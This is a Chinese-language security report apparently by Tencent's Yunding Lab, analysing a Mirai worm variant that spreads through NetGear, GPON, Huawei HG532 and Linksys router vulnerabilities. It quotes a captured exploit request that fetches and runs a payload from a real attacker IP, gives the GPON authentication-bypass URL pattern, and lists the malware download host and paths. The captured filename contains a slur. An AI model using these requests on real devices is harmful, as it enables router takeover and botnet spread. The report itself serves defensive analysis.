IoT 分析 | 路由器漏洞頻發,Mirai 新變種來襲
一、前言
近期騰訊安全雲鼎實驗室聽風威脅感知平臺監測發現一款攻擊路由器的蠕蟲病毒,經過分析,認定此款蠕蟲是 mirai 病毒的新變種,和之前的 mirai 病毒不同,該蠕蟲不僅僅通過初代 mirai 使用的 telnent 爆破進行攻擊,更多通過路由器漏洞進行攻擊傳播。
二、Playload 與漏洞分析
樣本在傳播和攻擊過程中涉及到4個 PlayLoad ,均針對路由器進行攻擊,我們會對相關漏洞進行介紹,並針對傳播情況利用抽樣資料進行統計分析。
表 PlayLoad 情況:
圖 影響裝置分佈:
資料來源:騰訊安全雲鼎實驗室
上圖是幾款路由器漏洞影響的國家範圍,中國、俄羅斯、日本和美國是受災較為嚴重的國家。與國家發展程度、網路普及程度有一定關係,也與上述幾款路由器的銷售區域有著較強的關聯。由於國產裝置多,安全性不高等原因,我國未來 IoT 安全面臨著巨大的挑戰。
下面我們針對這四個漏洞分別進行介紹:
01 NetGear 路由器任意執行漏洞(CNNVD-201306-024)
1)漏洞分析:
POC 通過GET方法執行setup.cgi,通過todo命令執行syscmd,通過syscmd來執行下載和執行病毒的命令。
GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1rnrn
程式碼如下:
A、執行setup.cgi後執行setup_main:
B、使用 GET 和 POST 方法都可以提交 POC:
Todo引數後面直接調取相關的檔案執行,沒有做任何過濾,這裡也是被利用的地方,直接呼叫syscmd來執行自己想要的命令。
2)傳播情況:
圖 NetGear DGN裝置遠端任意命令執行漏洞攻擊資料抽樣統計
資料來源:騰訊安全雲鼎實驗室
發起 NetGear 漏洞攻擊最多的地區是俄羅斯,可以推斷帶有NetGear 漏洞掃描的病毒載體感染量大。
02 GPON 光纖路由器命令執行漏洞(CVE-2018-10561/62)
1)漏洞分析:
裝置上執行的HTTP伺服器在進行身份驗證時會檢查特定路徑,攻擊者可以利用這一特性繞過任意終端上的身份驗證。
通過在URL後新增特定引數 ?images/,最終獲得訪問許可權:
http://ip:port/menu.html?images/ http://ip:port/GponForm/diag_FORM?images/
圖 GPONPlayLoad:
2)傳播情況:
圖 GPON裝置遠端任意命令執行漏洞攻擊資料抽樣統計
資料來源:騰訊安全雲鼎實驗室
此漏洞的病毒載體感染範圍較大,對於中國、喬治亞、埃及的影響最為廣泛。中國美國的光纖發展迅速,埃及和喬治亞受到中國影響,光纖發展速度也很快,也是他們受影響裝置多的一個原因。
03 華為HG532系列路由器遠端命令執行漏(CVE-2017-17215)
1)漏洞分析:
圖 HG532 PlayLoad
我們可以觀察POC 首先提交一個身份認證資訊,之後upgrade裡面的NewStatusURL標籤中執行了想要執行的命令。模組在upnp中,我們找到upnp模組,並找到NEwStatusURL標籤,程式碼直接通過SYSTEM執行命令(upg -g -u %s -t ‘Firmware Upgrade….’),沒有做任何過濾。
2)傳播情況:
圖 華為HG532裝置遠端命令執行漏洞攻擊資料抽樣統計
資料來源:騰訊安全雲鼎實驗室
圖 CVE-2017-17215 世界影響範圍
資料來源:騰訊安全雲鼎實驗室
通過華為 HG532 裝置遠端命令執行的攻擊統計,可以看出,利用此漏洞的病毒載體或掃描在中國、日本、俄羅斯非常活躍。
04 Linksys多款路由器 tmUnblock.cgi ttcp_ip 引數遠端命令執行漏洞(CNVD-2014-01260)
1)漏洞分析:
多款Linksys路由器沒有被正確過濾 ‘ttcp_ip’ 引數值,在 tmUnblock.cgi 指令碼的實現上存在安全漏洞,經過身份驗證的遠端攻擊者可利用此漏洞執行任意命令。受影響產品包括但不侷限於:
E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300 WAG320N WAP300N WAP610N WES610N WET610N WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N
2)傳播情況:
圖 Linksys 多款路由器裝置遠端命令執行漏洞攻擊資料抽樣統計
資料來源:騰訊安全雲鼎實驗室
相關漏洞樣本的下載地址很固定,基本分佈於拉斯維加斯、新加坡、莫斯科和阿姆斯特丹這四個城市。經過黑產鏈條的團伙比對,針對路由器的黑產團伙伺服器的配置位置,在這幾個地方部署的量確實較大。
圖 病毒伺服器分佈圖
資料來源:騰訊安全雲鼎實驗室
詳細的伺服器分佈資訊如下表所示:
表 捕獲到的相關樣本下載 IP 地址
三、樣本分析
樣本md5:099b88bb74e9751abb4091ac4f1d690d
源地址統計(112.28.77.217):13次,主要攻擊了81、8080埠
下載IP:46.17.47.82
樣本與mirai是同一個家族的樣本,是mirai病毒的一個變種。程式碼結構和解密後的字串均非常相似,不同的是此變種使用了3個路由器漏洞進行傳播。
Mirai bot 程式碼的結構如下:
包含了攻擊模組、掃描模組和結束模組三個大模組,此樣本程式碼結構與mirai一樣,只是相比增加了三種針對路由器的掃描模組。
與以前的mirai不同,這裡檢測/dev/watchdog,/dev/misc/watchdog,/dev/FTWDT101_watchdog,/dev/FTWDT101watchdog,/dev/FTWDT101/watchdog,/sbin/watchdog,/bin/watchdog,/dev/watchdog0,/etc/default/watchdog,/etc/watchdog 等來避免重啟。
相比傳統的mirai(/dev/watchdog,/dev/misc/watchdog)多了很多新的watchdog檢測。同時包含了 Linux.Okiru 用來檢測的路徑(/dev/FTWDT101_watchdog,/dev/FTWDT101 watchdog)。
攻擊伺服器包含了很多相關的檔案,各個作業系統平臺上的,不同版本的檔案。
樣本溯源:
下圖 POC 中包含了相關的下載地址:
通過訪問連結 46.17.47.82/cutie,發現其中包含了真正的下載連結。
儲存的路徑為:/tmp/gdf,/tmp/gxy,/tmp/dhf,/tmp/ttb;
再直接訪問根目錄,包含了一條 Twitter 地址:
該 Twitter的作者Philly是一個美國人,病毒存放的路徑為nigr(Philly的自稱),從Twitter中未發現直接與蠕蟲相關的推文。
圖 相關Twitter截圖
關於樣本捕獲:
通過騰訊安全雲鼎實驗室聽風威脅感知平臺進行捕捉樣本,聽風威脅感知平臺是雲鼎實驗室在全球多個節點部署的蜜罐網路叢集,用於捕獲真實的惡意流量,每天捕獲數億次的各類攻擊請求。
相關捕捉介面如下:
參考文件:
ofollow,noindex" target="_blank">https://www.freebuf.com/vuls/171457.html
https://www.linuxidc.com/Linux/2014-02/97171.htm
https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/
騰訊安全雲鼎實驗室 關注雲主機與雲內流量的安全研究和安全運營。利用機器學習與大資料技術實時監控並分析各類風險資訊,幫助客戶抵禦高階可持續攻擊;聯合騰訊所有安全實驗室進行安全漏洞的研究,確保雲端計算平臺整體的安全性。相關能力通過騰訊雲開放出來,為使用者提供黑客入侵檢測和漏洞風險預警等服務,幫助企業解決伺服器安全問題。